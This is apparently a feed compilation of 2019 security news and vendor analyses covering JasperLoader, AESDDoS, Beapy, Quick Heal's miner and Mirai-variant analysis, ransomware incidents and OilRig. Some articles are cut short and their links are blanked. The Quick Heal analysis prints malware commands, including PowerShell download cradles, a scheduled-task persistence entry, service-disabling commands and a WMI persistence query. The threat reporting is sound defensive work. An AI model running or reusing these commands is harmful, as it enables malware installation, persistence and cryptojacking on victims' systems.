Signed Malspam campaigns hit Europeans with Multi-Stage JasperLoader

Experts observed several malspam campaigns using signed emails to deliver the GootKit banking Trojan (aka talalpek or Xswkit).

Threat actors leverage a multi-stage malware loader tracked as JasperLoader in the malspam campaigns over the past few months.

The JasperLoader was observed while distributing malware to targets from Central Europe, most of them in Italy and Germany.

The Gootkit banking Trojan was previously distributed by DanaBotNeutrino exploit kit, and Emotet.

“Specifically, we’re tracking a loader known as “JasperLoader,” which has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries with a particular focus on Germany and Italy.” reads the analysis published by Cisco Talos. “JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult.”

The JasperLoader loader uses a multi-stage infection process that implements several obfuscation techniques to avoid detection. According to Cisco Talos experts, the JasperLoader loader was designed with resiliency and flexibility in mind.

The malspam campaigns detected by Cisco Talos that hit European countries use weaponized attachments containing either a Visual Basic for Applications (VBS) script or a DOCM documents with VBA macros.

malspam campaigns jasperloader

Talos experts also noticed spam messages containing malicious JS downloaders.

The latest malspam campaigns observed by Talos use message signing to confirm the authenticity of the sender.

Talos has identified several malicious campaigns making use of this type of message signing as a way to lend credibility to their messages and maximize the likelihood that potential victims will open the malicious attachments.” continues the analysis of the researchers.

The campaigns that targeted Italian users leverage legitimate certified email services such as Posta Elettronica Certificata (PEC).

“The choice to abuse certified email services such as PEC demonstrates that as attackers are always looking for new ways to lend credibility to their social engineering attacks.” continues Cisco Talos.

“In this case, abusing a legitimate email service allowed them to deliver their malicious emails in a way that would maximize the likelihood that a potential victim would open the attachments and infect themselves with JasperLoader. “

The JasperLoader malware loader is used by threat actors to check targets geolocation and determine if a machine is in one of the countries targeted in the malspam campaign (i.e. Russia, Ukraine, Belarus, or People’s Republic of China).

Experts observed that the malware gains persistence by adding an LNK shortcut to itself to the Startup folder, in this way every time the system is rebooted the malware will be launched.

The JasperLoader is used by threat actors to update the loader, to run Powershell scripts, and, of course, to deliver the final Gootkit malware payload.

Further technical details, such as Indicators of compromise (IOCs), are included in the analysis published by Talos.

Pierluigi Paganini

(SecurityAffairs – malspam campaigns, JasperLoader)

The post Signed Malspam campaigns hit Europeans with Multi-Stage JasperLoader appeared first on Security Affairs.

AESDDoS bot exploits CVE-2019-3396 flaw to hit Atlassian Confluence Server

A new variant of the AESDDoS bot is exploiting a recent vulnerability in the Atlassian collaborative software Confluence.

Security experts at Trend Micro have spotted a new variant of AESDDoS botnet that is exploiting a recently discovered vulnerability in the Atlassian collaborative software Confluence.

The flaw exploited in the attacks, tracked as CVE-2019-3396, is a server-side template injection vulnerability that resides in the Widget Connector macro in Confluence Server.

Threat actors leverage the vulnerability to install denial of service (DDoS) malware and crypto-currency miners, and to remotely execute code.

“In our analysis, we saw that an attacker was able to exploit CVE-2019-3396 to infect machines with the AESDDoS botnet malware.” reads the analysis published by Trend Micro. “A shell command was remotely executed to download and execute a malicious shell script (Trojan.SH.LODEX.J), which in turn downloaded another shell script (Trojan.SH.DOGOLOAD.J) that finally installed the AESDDoS botnet malware on the affected system.”

The AESDDoS bot involved in the recent attacks has the ability to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The malware also connects to 23[.]224[.]59[.]34:48080 to send and receive remote shell commands from the attacker.

Once the malware has infected a system, it can gather system information, including model ID and CPU description, speed, family, model, and type.

The AESDDoS bot uses the AES algorithm to encrypt gathered data and data received from the C2 server.

Trend Micro researchers also discovered that the latest variant of the AESDDoS bot can modify files i.e., /etc/rc.local and /etc/rc.d/rc.local, as an autostart technique by appending the {malware path}/{malware file name} reboot command.

Atlassian has already addressed the vulnerability in the Confluence software with the release of the version 6.15.1.

“Since the successful exploitation of CVE-2019-3396 in Atlassian Confluence Server can put resources at risk, enterprises should be able to identify vulnerabilities, make use of the latest threat intelligence against malware or exploits, and detect modifications to the application’s design and the underlying infrastructure that hosts it,” Trend Micro concludes.

Pierluigi Paganini

(SecurityAffairs – AESDDoS bot, DDoS)

The post AESDDoS bot exploits CVE-2019-3396 flaw to hit Atlassian Confluence Server appeared first on Security Affairs.

Beapy Cryptojacking campaign leverages EternalBlue exploit to spread

Security experts uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit.

Security experts at Symantec have uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit to spread a cryptocurrency malware on enterprise networks in Asia.

“Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.” reads the analysis published Symantec.

Beapy (W32.Beapy) is a file-based coinminer that uses email as an initial infection vector.”

The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system, it is installed by leveraging the ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploitthat could trigger an RCE in older versions of Windows (Windows XP to Server 2008 R2).

Every Window machine running an old vulnerable version that exposes an SMB service is at risk of hack. The DOUBLEPULSAR and ETERNALBLUE are now available for anyone after the archive of NSA tools was leaked online by ShadowBrokers hacker group.

Most of the victims are located in China (80%), remaining in South Korea, Japan, and Vietnam.

The experts first observed the campaign in January, almost any victim is an enterprise (98%).

The attack chain starts with phishing email using as an attachment the Excel document that downloads the DoublePulsar backdoor used to deliver the EternalBlue exploit.

Once the backdoor is installed, a PowerShell command will allow the malware to connect the command and control server. The malicious code executes more PowerShell scripts before the crypto currency miner is downloaded.

Experts reported that the Beapy malware also uses the popular post-exploitation tool Mimikatz to steal passwords from Windows systems.

Experts at Symantec also discovered an earlier version of Beapy malware that hit a public-facing web server and that was attempting to spread to connected systems.

It was coded in C rather than Python, this version also includes both
EternalBlue and Mimikatz.
The malicious code also leverages other exploits for known vulnerabilities in Apache Struts, Apache Tomcat, and Oracle WebLogic Server.

“In the web server compromise, Beapy also attempted to exploit an Apache Struts vulnerability (CVE-2017-5638). This vulnerability was patched in 2017, but if successfully exploited it can allow for remote code execution.” continues the analysis. “Beapy also tried to exploit known vulnerabilities in Apache Tomcat (CVE-2017-12615) and the Oracle WebLogic Server (CVE-2017-10271). In the case of this web server compromise observed by Symantec, exploit attempts began in early February, with connections to Beapy’s C&C server first observed on March 13. Activity targeting this web server continued until early April.”

Experts observed a spike in the activity of Beapy in March:

Beapy malware

Since Coinhive cryptocurrency mining service shut down in March, experts observed a drop in cryptojacking attacks.

Unlike Coinhive, Beapy is a file-based miner that must be installed by attackers on the victims’ machines in order to mine cryptocurrency.

“As well as these factors, file-based coinminers also have a significant advantage over browser-based coinminers because they can mine cryptocurrency faster.” states Symantec, “The Monero cryptocurrency, which is the cryptocurrency most commonly mined during cryptojacking attacks, dropped in value by 90 percent in 2018, so it may make sense that miners that can create more cryptocurrency faster are now more popular with cyber criminals.”


The Beapy campaign was also spotted by other security firms, including Qihoo 360’s research team and a Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Beapy miner, hakcing)

The post Beapy Cryptojacking campaign leverages EternalBlue exploit to spread appeared first on Security Affairs.

Miners snatching open source tools to strengthen their malevolent power!

Estimated reading time: 10 minutes

From the last one year, Quick Heal Security Labs has been observing a boost in the number of mining malware. One of the ways to earn cryptocurrencies is to mine them. Nowadays cryptocurrency miner malware have become hot attack vectors for cybercriminals due to its ease of deployment and instant return on investments. We usually observe that such miners come with different techniques to deliver it to a victim. Attacker can download original open source software and slightly modify them rather than completely writing their own module.

In this blog post, we would talk about couple of cases where attack scenario is built on top of these open source tools. We would also talk about how the trend of abusing open source tools for building new malware is helping malware authors.

The trend is observed especially in cryptojacking cases. Though cryptojacking is a direct source of income for cybercriminals, stolen information from the victim’s systems can yield additional money for cybercriminals. So, these open source tools are used for various purposes like downloading frameworks, information stealing, crypto-mining, DNS Changer, Mirai bot and many more. This helped a lot to form a botnet of similar hosts to produce more hashes per second. Often such open source tools are easily available on Github and similar platforms. We can classify them as exploit frameworks, vulnerability scanners, password stealer, privilege elevators, evaders, etc.

Infection vector:

We received a miner downloader which downloads multiple components of the attack. This script may come to your system through spam mails, malicious URLs, free software bundler or any conventional method that is being used by all the malware variants. Also, we suspect that a powershell script seems to be the initial culprit. The behavior of the miner is a bit recursive in nature so we could not confirm its initial trace in the system.

Technical Analysis:

Fig. 1 Working of miner

The miner downloader creates a file named as ‘xpdown.dat’ which contains some IP addresses of C2 servers from where it downloads further components.

It then downloads the following files from the domains:


It contains the IP which downloads the CPU Miner (


It contains the following list of process to kill if it was running on victim machine.

lsmose.exe                            lsmos.exe                         conime.exe                            lsmosee.exe
1.exe                                      lsazs.exe                           tasksche.exe                          Zationa.exe
csrs.exe                                 shennong.bat                  svshpst.exe                            Spoolvs.exe
svchsot.exe                           xmrig.exe                        srvany.exe                              WinSCV.exe
csrswz.exe                            csrs.exe                              seser.exe                                severxxs.exe
mssecsvc.exe                       mssecsvr.exe                    dsbws.exe

Then malware downloads a text file which contains the information of multiple payloads to be downloaded.


And this down.txt contains the following links. The malware then opens a TCP port 32381 on the system.

hxxp://              (C:\windows\system\downs.exe)
hxxp://                         (C:\windows\system\cab.exe)
hxxp://                            (C:\windows\inf\msief.exe)
hxxp://                 (C:\windows\debug\item.dat)

Looking at the links in the file we observed following things.

Downs.exe is a modified version of Microsoft “CACLS” (Which displays and modifies the access control list). Ups.rar is downloaded as cab.exe. This component is a downloader for windows variant of Mirai botnet. This also acts as a DNS Changer and opens a backdoor in the system. On execution, it performs multiple operations like modifying the DNS entry in the host with IP “” which has the Geo location in China and ISP of DNS is “Hangzhou Alibaba Advertising Co.,Ltd.”


Fig. 2 Window Server Check


Then it checks whether the compromised machine is a window server or not by calling GetVersionExA. It downloads update.txt from C2 server, if the machine is server, and drops at “C:\windows\system\uplist.txt”. The uplist.txt contains the following payload to be downloaded and executed.

hxxp://                     (C:\windows\system\msinfo.exe)
hxxp://                   (C:\windows\system\my1.bat)

It also downloads npptools.dll, 64npf.sys, npf.sys, nsoak.dat, packet.dll and wpcap.dll. These are files used for network packets processing loaded by msinfo.exe during its execution.

Let’s look into these components one by one.


It contains the code which is very stealthy and evasive as it uses several techniques such as “Squiblydoo”, “download cradle” and WMI Event Subscription persistence exploit to run malicious content on infected machines.

The WMI script contains multiple PowerShell scripts.

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://’)

This text file contains another PowerShell downloader as follows:

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://’)

“Up.txt” contains the code which collects information regarding System OS, Physical Memory, List of running processes using WMI classes and then downloads Powershell format of Mimikatz from Github.

Further it steals the credentials from the compromised machine and uploads it to the FTP server IP: with hard coded credential of FTP.

Fig. 3 Victims Data in FTP Server.


 It is basically a windows version of Mirai botnet. As more of its code matches with Mirai source code which was leaked previously. Upon execution with command line parameters “-create” “-run”, it checks the architecture of the current system whether it is x86, MIPS, ARM etc. Based on the identification, it will check for its latest update and download if available.

It performs the following task as per an encrypted file downloaded from C2 server.

  1. Implements spreader mechanism by performing in the form of blind SQLi (sql injection), brute force techniques by using crack library and hydra tool.
              [Cracker:Telnet][Cracker:MSSQL] [Cracker:CCTV][Cracker:MS17010], CrackerWMI, CrackerSSH
  1. It scans various ports such as 80,8000,445 using masscan (a very fastport scanner an open source project) which operates similar to nmap , the popular port scanning tool.
  1. Disable specific services by invoking the following command:
              C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm
              start= disabled&sc stop NlaSvc&sc config     NlaSvc start=disabled
  1. It also performs network scan for which it collects the Public/Private IP of the system and all the  associated information such as Geo Location etc. Then attacker spoofs his own IP against the current system IP and using masscan it performs scanning of other devices.

By these steps it converts this system into a bot and adds to their bot network. Its code has been developed in C++ and distributed across many sources like-

Task_Scan.cpp WPD.cpp

It basically targets IoT devices which contain embedded Linux. So it has used BusyBox (a software suite that provides UNIX utilities also called as Swiss Army Knife of embedded Linux) for executing remote commands after compromising/cracking those devices through various ways mentioned above.

VBS/BAT Agent For Download Miner:

First the payload will be dropped and executed on the below location in the victim machine.

hxxp://                      ( downloaded at C:\windows\inf\msief.exe)

On execution, it will drop the VBS and batch file in the below mentioned location and execute the vbs file by invoking wscript.exe which eventually execute the bat file.


The bat file contains a lot of code, which will modify attributes of some folder/files, kill some specific processes, delete some files, modifies the access control of some folder/files, make persistent for multiple payload in the system via registry, task scheduler, WMI Event subscription and also modifies the firewall policy by blocking 445,139 ports.


Fig. 4 Part of C3.bat code

There are also two more additional payloads which are downloaded from one of C2 server present in xpdown.dat; one is a diskwritter, a DLL file , dropped at “C:\Windows\debug” location. It will execute on system start as it has an entry in task scheduler added by the above bat file.

schtasks /create /tn “Mysa1” /tr “rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa” /ru “system”  /sc onstart /F

And the second one is the final payload i.e. XMRig Monero Miner, a 64 bit executable downloaded from hxxp:// at “C:\windows\debug\lsmos.exe”

On execution, it unpacks itself and drops 3 files on the current execution folder, one is an executable (lsmose.exe -64 bit packed with VM Protect) file and two DLLs (xmrstak_cuda_backend.dll and xmrstak_opencl_backend.dll), which helps miner for successful execution.

One more similar case we have observed, a base64 encoded PowerShell script which is basically a cryptomining malware hiding in WMI class to evade AV and most of the security product due to its stealthy and unique feature.

After decoding we get the following code:

Fig. 5 Base64 Decoded script


Following is basic workflow of the malware.

Fig. 6 Basic workflow of miner with WMI class

On execution, it checks whether IP/Domain is alive or not mentioned in the code. If it is available, it requests for banner and receive a response as ‘SCM Event1 Log

Fig. 7 Request for “banner” and another PowerShell Payload

After that malware queries for ‘FilterToConsumerBinding’ WMI Class by executing the below command

$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding))

and then checks whether it contains ‘SCM Event1 Log’. If not present, then it downloads and executes in6.ps1 (64 bit) or in3.ps1 (32 bit) by Invoking Expression(IEX).


Fig. 8 Request for powershell script


These scripts consist of two parts, first part is a base64 encoded Gzip data stream and second part contains obfuscated code. After de-obfuscation, the code reassembles similar to initial base64 encoded script with additional features.

Fig 9 decoded in6.ps1

The encoded gzip contains four files as mentioned below:

  1. ‘mini’ – Mimikatz, a credential stealer
  2. ‘mon’ – Monero CPU Miner
  3. ‘funs’ – Collection of functions having function to execute remote DLL via WMI and eternal blue vulnerable scanning.
  4. ‘sc’ – Shellcode to execute on another systems and to download same payload, if it is vulnerable to eternal blue.

It creates a WMI Class “systemcore_Updater0” under the Namespace “root\default” and adds properties like mimi, mon, funs, sc, ipsu and i17.

Fig 10 Properties of WMI Class “systemcoreUpdater0”

Then it sets the filtername=”SCM Event1 Log Filter” and consumername=”SCM Event1 Log Consumer”

When attacker uses WMI as a persistence mechanism, instances of __EventFilter,_EventConsumer and __FilterToConsumerBinding have to be created and an _InstanceCreationEvent event is fired.

In this case, attacker uses following query as the EventFilter and binds it with the initial base64 encoded script, which will eventually get executed approximately in every 3 hrs.

SELECT * FROM __InsanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System

Fig 11 Initial PS script hidden in WMI Class

It has tried to delete the task scheduler entry “sysupdater0” also checks “sysupdater0.bat” in %systemroot% , if exists remove that as well.

Modifies Windows sleep, hibernate and power plan setting by invoking the following command:
powercfg /CHANGE -standby-timeout-ac 0
powercfg /CHANGE -hibernate-timeout-ac 0
powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

It removes all WMI Object in __FilterToConsumerBinding class under Namespace “root\subscription” if filter name has not matched with “SCM Event0 Log”

Then it kills the process if it has an “ESTABLISHED” connection with port number 3333, 5555 or 7777.

It makes a list of PIDs of running “Powershell” processes and the network connections of the system. It then checks for the process with “ESTABLISHED” connection and associated port number 80 or 14444 or 14433 or 443. If no such processes exist and the count of running PowerShell processes are less than 8 then it executes the Monero Miner using “funs” module. After that it executes the mimikatz and dumps the credential irrespective of execution of Monero Miner.

It also enumerates the network addresses and checks for the IPs that are active and adds them to the property named, ‘ipsu’. It then scans those IPs to identify the systems which are vulnerable to MS17-010 (with Eternal Blue Scanner Script), stores them to the property ‘i17’ and finally executes shell code which will download the ze3.ps1 or ze6.ps1 exactly similar to in3.ps1 or in6.ps1 based on OS architecture.

Fig 12 Shell code executed by invoking “WinExec”

Shell code downloads and executes the PS Script to infect other vulnerable systems. This way it spreads and mines the other systems on the networks.

So in both the cases, the open source tools are abused heavily to perform the attack. Mimikatz, masscan, eternal blue vulnerability scanner seems to be popular tools among the malware authors. Similar techniques are being used for spreading the ransomware too. Seqrite successfully detects such attacks at various detection levels.

Indicator of Compromise:



Subject Matter Expert:

Priyanka Shinde, Goutam Tripathy, Vallabh Chole
Security Labs, Quick Heal Technologies, Ltd.

The post Miners snatching open source tools to strengthen their malevolent power! appeared first on Seqrite Blog.

Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware

The special-purpose vehicle maker Aebi Schmidt was hit by a malware attack that disrupted some of its operations.

The Aebi Schmidt Group is a manufacturer of product systems and services for the management, cleaning and clearance of traffic areas as well as for the maintenance of green areas in demanding terrain.

Aebi Schmidt focuses on manufacturing agricultural, municipal and other special-purpose vehicles, including snow blowers, street cleaners, and other machinery used in airports.

On Thursday Aebi Schmidt announced that its systems had been hit by a malware-based cyberattack. The incident caused the disruption of some of its operations, such as email management.

The malware only infected Windows systems, in response to the incident the company temporarily switched off these systems.

“The IT system failure is due to an attempt by third parties to infiltrate malware into our systems. More and more companies worldwide are being affected by such attacks.” reads a note published by the company on its website.

Aebi Schmidt

The company notified the incident to customers and business partners, it asked them to contact it via phone until its email systems are restored.

Fortunately, the cyber attack has not impacted production systems, order processing, US-based M-B Companies, or its telematics platform.

Windows systems are currently being “rebooted step by step,” but the process could be “time consuming.”

Aebi Schmidt did not share technical details of the cyber attack, but according to TechCrunch, the company was hit by a ransomware.

“Aebi Schmidt, a European manufacturing giant with operations in the U.S., has been hit by a ransomware attack, TechCrunch has learned. ” reads the post published by TechCrunch. “Schiess [spokesperson Thomas Schiess  ] would not comment on claims of ransomware specifically, but the source said staff were told during an all-hands meeting Wednesday that the incident was a “ransomware attack.” “

Recently another major European company was hit by ransomware, the aluminum giant Norsk Hydro suffered an extensive cyber attack that impacted operations in several of the company’s business areas across Europe and the U.S. The company estimated more than $40 million losses in the first week following the ransomware attack that disrupted its operations.

Pierluigi Paganini

(SecurityAffairs – Aebi Schmidt, ransomware)

The post Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware appeared first on Security Affairs.

JasperLoader Emerges, Targets Italy with Gootkit Banking Trojan

Nick Biasini and Edmund Brumaghin authored this blog post with contributions from Andrew Williams.

Introduction to JasperLoader

Malware loaders are playing an increasingly important role in malware distribution. They give adversaries the ability to gain an initial foothold on a system and are typically used to deliver various malware payloads following successful compromise. These attacks are popping up more frequently, as we covered in July with Smoke Loader and Brushaloader earlier this year. Loaders allow attackers to decide which malware to drop based on how they feel they can best monetize the access they gained. While malware loaders are commonly seen with email-based threats, they have also been prevalent within the exploit kit landscape for years. Recently, Cisco Talos observed an increase in loader activity being used to deliver various malware to systems located in various European countries.

Specifically, we’re tracking a loader known as “JasperLoader,” which has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries with a particular focus on Germany and Italy. JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process.

Over the past several months, we’ve seen several spam campaigns with signed emails attempting to infect victims with JasperLoader and ultimately the Gootkit banking trojan. Message signing makes use of certificates’ verification to confirm the authenticity of the person sending the email, as only those with access to the private keys should be able to sign the message. Message signing is not the same as message encryption and is used only to validate the identity of the message sender not to guarantee the confidentiality of the message itself. Talos has identified several malicious campaigns making use of this type of message signing as a way to lend credibility to their messages and maximize the likelihood that potential victims will open the malicious attachments.


Smashing Security #125: Pick of the thief!

WannaCry's "accidental hero" pleads guilty to malware charges, Samsung and Nokia have fingerprint fumbles, the NCSC publishes a list of 100,000 dreadful passwords, and Apple finds itself at the centre of an identity mix-up. All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by John Hawes.

Static Malware Analysis Vs. Dynamic Malware Analysis

Malware Analysis: An Introduction

Cybercriminals are turning more sophisticated and innovative, new and advanced varieties of malware are coming up and malware detection is turning out to be a real challenge. Malware analysis, which involves analyzing the origin, the functionalities and the potential impact of any malware sample, is of key importance as regards cybersecurity in the modern world.

Security professional rely on malware analysis for various purposes. They could use it to assess the extent of infection whenever there is a malware strike or to identify the nature of the malware involved. Similarly, a proper understanding of the functionalities and impact of any malware sample helps them tackle cyberattacks in a better way.

There are two different kinds of malware analysis, namely static malware analysis and dynamic malware analysis.

Static malware analysis

Static malware analysis involves examining any given malware sample without actually running or executing the code. This is usually done by determining the signature of the malware binary; the signature is a unique identification for the binary file. Calculating the cryptographic hash of the binary file and understanding each of its components helps determine its signature. The executable of the malware binary file is loaded into a disassembler (for example, IDA) and thus the machine-executable code gets converted to assembly language code. Thus, by doing this reverse-engineering on a malware binary file, it’s rendered easy for a person to read and understand. The analyst, by looking at the assembly language code, gets to understand the malware better. A better idea can be formed about the functionalities that it’s programmed to do and the potential impact it can have on any system and network. Analysts use different techniques for static analysis; these include file fingerprinting, virus scanning, memory dumping, packer detection, and debugging.

Dynamic malware analysis

Dynamic malware analysis, unlike static malware analysis, involves analysis while running the code in a controlled environment. The malware is run in a closed, isolated virtual environment and then its behavior studied. The intention is to understand its functioning and behavior and use this knowledge to stop its spread or to remove the infection. Debuggers are used, in advanced dynamic malware analysis, to determine the functionality of the malware executable. Dynamic malware analysis, unlike static analysis, is behavior-based and hence analysts won’t miss out on important behaviors of any malware strain.

Static Vs. Dynamic Malware Analysis: The differences

Let’s try and list out the basic differences between the two different kinds of malware analysis…

  • While static malware analysis is signature based, dynamic analysis is behavior-based.
  • While the code is not executed during static analysis, the malware code is run in a sandbox environment.
  • Static analysis is quite simple and just observes the behavior of the malware and attempts to analyze its capabilities. Dynamic analysis performs a more thorough kind of analysis of the actions, the functionalities and the impact of the malware, with the analyst studying it at each and every phase of its deployment and functioning.
  • While static analysis works for the common malware, dynamic analysis, being behavior-based, is needed for the more sophisticated and advanced kind of malware.

The conclusion

Malware analysis is of utmost importance since it helps understand malware infections and stop malware from spreading into other systems, files, directories etc. Malware analysis, static as well as dynamic, helps understand malware and their functioning in a better way and also helps us prevent further attacks in a very effective manner.

Related Resources:

12 Warning Signs That Help Identify Malware Infection

Security Tools That Recovers Hacked Website

What’s New With Separ Malware Family in 2019

The post Static Malware Analysis Vs. Dynamic Malware Analysis appeared first on .

Global Threat Statistics for the week of April 5, 2019

Cryptojacking Boosts Botnet Expansion

Botnets have been essential tools in distributed denial of service attacks for many years. With the continued success of DDoS attacks, it was only a matter of time before botnets were used for other malicious activities. In the past year, we’ve seen botnets used for generating spam and phishing emails, DNS attacks, pay-per-click abuse, ransomware, and cryptojacking.

Cryptojacking, in particular, has seen a significant increase. BleepingComputer just reported on a cryptojacking botnet that is actively attacking Asian targets. The same cryptojacking campaign was detected attacking Chinese targets back in January. Among other attempts to compromise its targets, the attack deploys a malicious XMRig Monero crypto miner.

These botnets can be massive. The Necurs botnet is comprised of 570,000 hosts (more specifically, unique bot IDs) according to Century Link’s Black Lotus Labs. Among them, India leads the pack, hosting nearly one in five Necurs bots.

The statistics that follow are based on an analysis of over 100 million endpoints by Comodo Threat Intelligence Lab for the week of April 5, 2019. In addition to botnets, it includes statistics on malware and phishing.

Countries and Regions Hosting and Malware Botnets

countries which host

With active botnets like Necurs and others targeting computers in India and China, it is understandable that those two countries account for one-third of all botnets, with India at 21% and China at 11%. There are a number of variables that impact where malware and botnets may be hosted, such as availability of target computers, ease of access, the vulnerability of accessible computers, and type of malware. These are constantly changing, so it introduces a bit of randomness to the results, making the statistics that follow a snapshot in time.

Egypt, Iran, Vietnam, and Turkey account for 5% each. Russia follows at 4%, with Brazil and the United States close behind at 3%.
india ranked

Within India, Maharashtra hosted 19% of botnets, followed by Tamil Nadu at 12%, National Capital Territory of Delhi at 10%, Gujarat 8%, and Uttar Pradesh, West Bengal, Telangana, and Karnataka at 6% each. Ten other regions each shared a small percentage of the remaining botnet hosts.
china ranked
Within China, Guangdong hosted just over a quarter of botnets. Zhejiang and Jiangsu each hosted 6%. Beijing and Fujian each hosted 6%. Twenty-one other territories each hosted less than 5%.
which country hosts

The United States hosted just over half of the world’s malware, down considerably from 63% in our last report. In the same time period, Germany jumped from 3% to 9%. Russia, Netherlands, and Italy follow with 6%, 5%, and 4%, respectively. France, India, and the United Kingdom are at 3% each, with all other countries listed each hosting 2% or less.
United states of america
Within the United States, the west coast hosted just over half of the world’s malware with Washington at 34%, California at 13%, and Oregon at 4%. Washington had a significant drop since in our last report, from 79% to 34%. California more than doubled from 6% to 13%.

Arizona joins the list at 12%. Texas follows at 7%. Also joining the list is Illinois at 5%, Colorado and Pennsylvania, both at 4%, and Utah and Virginia, both at 3%.
Top brands co-opted

One of the most successful phishing methods is to co-opt a well-respected brand, so it is no surprise that impersonating Apple and Microsoft occurs in one-third of website co-opt attempts. The goal of a phishing attack using these brands is to access your computer or device. The phishing usually comes in the form of a pretext of Apple or Microsoft technical support claiming they will fix some horrible (but somehow symptomless) problem you have. The goal is to have the user give them remote access to “fix” the laptop. Once the access is granted, they install malware that will typically include a keystroke logger and other tools to send them useful information from the device.

Half of the brands on the list are financial institutions. These are popular for the same reason their brick-and-mortar peers – that’s where the money is. Facebook, LinkedIn, Yahoo, and GoDaddy are phishing targets for account takeover. Taking over a GoDaddy account may give a cybercriminal full control of a website from which to launch phishing attacks. Impersonation is the goal of taking over a Facebook, LinkedIn, or Yahoo account. The cybercriminal lures your contacts or connections by pretending to be someone they trust, you.

The scale at which these attacks are being deployed is evident in the number of web pages using this type of attack. This analysis discovered 210,560 web pages impersonating these brands for the purpose of phishing, considerably more than the 61,767 in our last report. Most of those have since been taken down but over 50,000 malicious web pages are still up and running to lure your users.

Sharing this information is important so that your users know to be more vigilant if they get an email or alert, supposedly from Apple, Microsoft, or the others in this chart. Some of these phishing websites look quite authentic and may fool even security-minded users. This type of information is a great addition to your security awareness program.

The post Global Threat Statistics for the week of April 5, 2019 appeared first on .

Stuart City is the new victim of the Ryuk Ransomware

Another city fell victim of a malware attack, systems at the city of Stuart, Fla., were infected by the Ryuk ransomware on April 13, 2018.

Law enforcement is investigating a ransomware attack that hit the City of Stuart on April 13, 2018. The Ryuk malware infected several servers and forced them offline.

“City officials on Wednesday confirmed a computer virus that infected servers over the weekend was the result of a ransomware attack.” reported the website TCPalm.

“The virus detected Saturday froze up the city’s servers and they are still offline, said Stuart City manager David Dyess.”

According to officials, the ransomware attack targeting the city of Stuart started with a phishing email, the infection was discovered by an IT employee who was setting up a new server.

City manager David Dyess confirmed that the city systems were infected with a strain of the Ryuk ransomware, but he did not disclose the Bitcoin ransom demanded by crooks.

“They discovered we had two things going on: We had what’s called a trickbot, which is basically a malware type of regular virus which can lead to other more serious issues,” Dyess said. “We also had the Ryuk virus that is an encryptor virus, where it encrypts your files and specifically likes to target your servers.”

Stuart city

At the time of writing, Dyess confirmed that experts are investigating to determine the way the attackers exploited to infect the systems.

IT staff at Stuart city has restored servers, payroll, utilities, and budgeting, only city employees still don’t have access to their email accounts.

Stuart’s police and fire departments are still offline, Dyess believe that overall services should be fully restored within the next week.

Early March, another city was hit by the same ransomware, computers of Jackson County, Georgia, were infected with Ryuk that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Unlike the Jackson County, Stuart City refused to pay the ransom.

“We are not negotiating with them. We are in the process of trying to rebuild our systems,” Dyess said. “We also began scanning every server in the city and every (personal computer) and every laptop in every department to eliminate any viruses on those outer machines.”

Dyess confirmed that the impact was limited thanks to the availability of city’s computer backup system.

“If we wouldn’t have had these viable backups, we would probably be in a situation where we had to move into negotiations,” he said. “But with those backups in place, why would we negotiate?”

The Ryuk ransomware appears connected to Hermes malware that was associated with the notorious Lazarus APT group.

The same ransomware was recently used in an attack that affected the newspaper distribution for large major newspapers, including the Wall Street Journal, the New York Times, and the Los Angeles Times.

Further investigation on the malware allowed the experts from security firms FireEye and CrowdStriketo discover that threat actors behind the 
Ryuk ransomware are working with another cybercrime gang to gain access to target networks. They are collaborating with threat actors behind TrickBot, a malware that once infected a system creates a reverse shell back to the attackers allowing them to break into the network.

Experts at Crowdstrike believe the Ryuk ransomware is operated by a crime gang they tracked as GRIM SPIDER, in particular by its Russian based cell dubbed WIZARD SPIDER that is behind TrickBot.

Experts pointed out that Hermes was available for sale into the online underground community, attackers could have purchased it to create their own version of Ryuk.

Pierluigi Paganini

(SecurityAffairs – Ryuk ransomware, Stuart city)

The post Stuart City is the new victim of the Ryuk Ransomware appeared first on Security Affairs.

OilRig APT uses Karkoff malware along with DNSpionage in recent attacks

Iran-linked OilRig cyberespionage group is using the reconnaissance malware Karkoff along with DNSpionage in recent campaigns.Iran-linked OilRig cyberespione group is using the reconnaissance malware Karkoff along with DNSpionage in recent campaigns.

The OilRig APT group, the threat actor behind the DNSpionage malware campaign, is carrying out a new sophisticated and targeted operation that infects victims with a new variant of the dreaded malware.

DNSpionage is a custom RAT that uses HTTP and DNS communication to connect with the C&C server.

Threat actors distributed the malware through compromised websites and weaponized documents.

“In February, we discovered some changes to the actors’ tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware.” reads the analysis published by Talos. “In April 2019, we also discovered the actors using a new malware, which we are calling “Karkoff.” reads the analysis published by Talos.

DNSpionage decoy doc

According to Cisco Talos threat research team, the attackers are leveraging on new tactics, techniques, and procedures to improve the efficacy of their operations.

